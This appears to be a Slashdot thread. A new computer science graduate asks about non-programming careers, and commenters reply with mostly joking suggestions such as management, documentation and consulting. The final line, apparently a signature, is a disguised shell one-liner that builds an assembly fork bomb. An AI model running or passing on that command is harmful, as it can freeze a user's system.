Non-Programming Jobs For a Computer Science Major?
An anonymous reader writes "I recently graduated from a 'major' university in America with a BS degree in Computer Science. I unfortunately must admit that I am not very skilled with programming. I finished with the degree, and I've spent much of my college career working a job doing technical support (fixing laptops, troubleshooting Windows problems, etc). What jobs can I get with a computer science degree that are NOT mainly programming jobs? A little programming wouldn't be bad, but none would be preferred. And what kind of salaries do these jobs typically fetch?"
n/t
$2.13/hr
Yeah, like your average slashdot geek knows about penetration... /sarcasm
Accenture is always looking for fresh faced graduates who can't actually do anything.
D.O.U.O.S.V.A.V.V.M.
with a BS
Looks like you'd be perfect for management.
Yes, anonymous was probably the right way to go with that submission on this site ;)
Well, you could take the specification from the customer, to the programmers.
If you've got people skill that is.
If you did good in english, you could write documentation.
Thank you for letting our managers hire people who want to do this job, instead of those just killing time.
...he said on slashdot.
Your sig(k) has been stolen. There is a puff of smoke!
I mean, if Frank Gehry doesn't know how to weld or install a toilet, fuck his buildings, man. Architecture degree my ass.
It's called a BS in Comp Sci for a reason you know.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;